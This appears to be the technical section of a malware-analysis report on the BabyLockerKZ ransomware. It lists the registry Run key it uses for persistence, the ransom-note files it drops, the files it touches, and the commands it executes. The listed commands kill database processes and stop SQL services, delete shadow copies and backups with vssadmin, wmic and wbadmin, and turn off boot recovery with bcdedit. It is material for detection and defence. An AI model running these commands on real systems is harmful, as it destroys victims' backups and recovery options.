Technical Information
- [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'BabyLockerKZ' = '"<Full path to file>"'
- <Drive name for removable media>:\how_to_back_files.html
- '<SYSTEM32>\taskkill.exe' -f -im sqlbrowser.exe
- '<SYSTEM32>\net.exe' stop SQLBrowser
- '<SYSTEM32>\net.exe' stop SQLAgent$MSFW
- '<SYSTEM32>\net.exe' stop SQLAgent$ISARS
- '<SYSTEM32>\net.exe' stop MSSQL$MSFW
- '<SYSTEM32>\net.exe' stop MSSQL$ISARS
- '<SYSTEM32>\net.exe' stop MSSQLServerADHelper100
- '<SYSTEM32>\taskkill.exe' -f -impostgres.exe
- '<SYSTEM32>\taskkill.exe' -f -im pg_ctl.exe
- '<SYSTEM32>\taskkill.exe' -f -im msftesql.exe
- '<SYSTEM32>\taskkill.exe' -f -im ReportingServicesService.exe
- '<SYSTEM32>\taskkill.exe' -f -im fdhost.exe
- '<SYSTEM32>\taskkill.exe' -f -im SQLAGENT.EXE
- '<SYSTEM32>\taskkill.exe' -f -im Ssms.exe
- '<SYSTEM32>\taskkill.exe' -f -im fdlauncher.exe
- '<SYSTEM32>\taskkill.exe' -f -im sqlceip.exe
- '<SYSTEM32>\taskkill.exe' -f -im MsDtsSrvr.exe
- '<SYSTEM32>\taskkill.exe' -f -im msmdsrv.exe
- '<SYSTEM32>\taskkill.exe' -f -im sqlserv.exe
- '<SYSTEM32>\taskkill.exe' -f -im sql writer.exe
- '<SYSTEM32>\net.exe' stop REportServer$ISARS
- '<SYSTEM32>\net.exe' stop SQLWriter
- <SYSTEM32>\vssadmin.exe
- <SYSTEM32>\wbadmin.exe
- %HOMEPATH%\desktop\64bit_notes.htm
- %HOMEPATH%\desktop\about.htm
- %HOMEPATH%\desktop\about.html
- %HOMEPATH%\desktop\adadsi.html
- %HOMEPATH%\desktop\archer.avi
- %HOMEPATH%\desktop\delete.avi
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\issi2013_template_for_posters.docx
- %HOMEPATH%\desktop\lisp_success.doc
- %HOMEPATH%\desktop\ovp25012015.doc
- %HOMEPATH%\desktop\sdszfo.docx
- %HOMEPATH%\desktop\split.avi
- %HOMEPATH%\desktop\testee.cer
- %HOMEPATH%\desktop\trivial-merge.html
- C:\users\public\desktop\how_to_back_files.html
- a:\how_to_back_files.html
- C:\how_to_back_files.html
- D:\how_to_back_files.html
- C:\kms\kms_vl_all_aio.cmd
- C:\msocache\all users\{90140000-0115-0409-1000-0000000ff1ce}-c\microsoft.vc90.crt.manifest
- C:\msocache\all users\{90140000-00ba-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-00a1-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-00a1-0409-1000-0000000ff1ce}-c\onenotemui.xml
- C:\msocache\all users\{90140000-0044-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0044-0409-1000-0000000ff1ce}-c\infopathmui.xml
- C:\msocache\all users\{90140000-0043-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0043-0409-1000-0000000ff1ce}-c\office32mui.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.es\proof.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.fr\proof.xml
- C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\wordmui.xml
- C:\msocache\all users\{90140000-001b-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-002c-0409-1000-0000000ff1ce}-c\proof.en\proof.xml
- C:\msocache\all users\{90140000-001a-0409-1000-0000000ff1ce}-c\outlookmui.xml
- C:\msocache\all users\{90140000-001a-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0019-0409-1000-0000000ff1ce}-c\publishermui.xml
- C:\msocache\all users\{90140000-0019-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0018-0409-1000-0000000ff1ce}-c\powerpointmui.xml
- C:\msocache\all users\{90140000-0016-0409-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0016-0409-1000-0000000ff1ce}-c\excelmui.xml
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\pkeyconfig-office.xrm-ms
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\proplusww.xml
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\setup.xml
- C:\msocache\all users\{90140000-0011-0000-1000-0000000ff1ce}-c\office32ww.xml
- C:\kms\kms_vl_all_aio_debug.log
- C:\msocache\all users\{90140000-0115-0409-1000-0000000ff1ce}-c\branding.xml
- C:\msocache\all users\{90140000-0115-0409-1000-0000000ff1ce}-c\officemui.xml
- ClassName: '' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
- '<SYSTEM32>\cmd.exe' /c net stop REportServer$ISARS
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
- '<SYSTEM32>\net1.exe' stop SQLBrowser
- '<SYSTEM32>\cmd.exe' /c net stop SQLBrowser
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
- '<SYSTEM32>\net1.exe' stop SQLAgent$MSFW
- '<SYSTEM32>\net1.exe' stop REportServer$ISARS
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
- '<SYSTEM32>\net1.exe' stop SQLAgent$ISARS
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
- '<SYSTEM32>\net1.exe' stop MSSQL$MSFW
- '<SYSTEM32>\cmd.exe' /c net stop MSSQL$MSFW
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
- '<SYSTEM32>\net1.exe' stop MSSQL$ISARS
- '<SYSTEM32>\bcdedit.exe' /set {default} recoverynabled No
- '<SYSTEM32>\cmd.exe' /c net stop MSSQL$ISARS
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
- '<SYSTEM32>\cmd.exe' /c net stop SQLAgent$ISARS
- '<SYSTEM32>\cmd.exe' /c net stop SQLWriter
- '<SYSTEM32>\cmd.exe' /c bcdedit.exe /set {default} recoverynabled No
- '<SYSTEM32>\net1.exe' stop SQLWriter
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\wbadmin.exe' delete backup -keepVersion:0 -quiet
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTABACKUP -deleteOldest
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\wbem\wmic.exe' SHADOWCOPY /nointeractive
- '<SYSTEM32>\cmd.exe' /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
- '<SYSTEM32>\cmd.exe' /c wbadmin delete backup -keepVersion:0 -quiet
- '<SYSTEM32>\cmd.exe' /c wbadmin DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\cmd.exe' /c wmic.exe SHADOWCOPY /nointeractive
- '<SYSTEM32>\cmd.exe' /c vssadmin.exe Delete Shadows /All /Quiet
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
- '<SYSTEM32>\cmd.exe' /c net stop SQLAgent$MSFW
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
- '<SYSTEM32>\cmd.exe' /c net stop MSSQLServerADHelper100
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
- '<SYSTEM32>\net1.exe' stop MSSQLServerADHelper100
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\cmd.exe' /c taskkill -f -impostgres.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im sqlceip.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im MsDtsSrvr.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im Ssms.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im msmdsrv.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im sqlserv.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im sql writer.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im fdlauncher.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im sqlbrowser.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
- '<SYSTEM32>\cmd.exe' /c rem Kill "SQL"
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
- '<SYSTEM32>\cmd.exe' /c pause
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im msftesql.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im ReportingServicesService.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im pg_ctl.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im fdhost.exe
- '<SYSTEM32>\cmd.exe' /c taskkill -f -im SQLAGENT.EXE
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLWriter' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe' (with hidden window)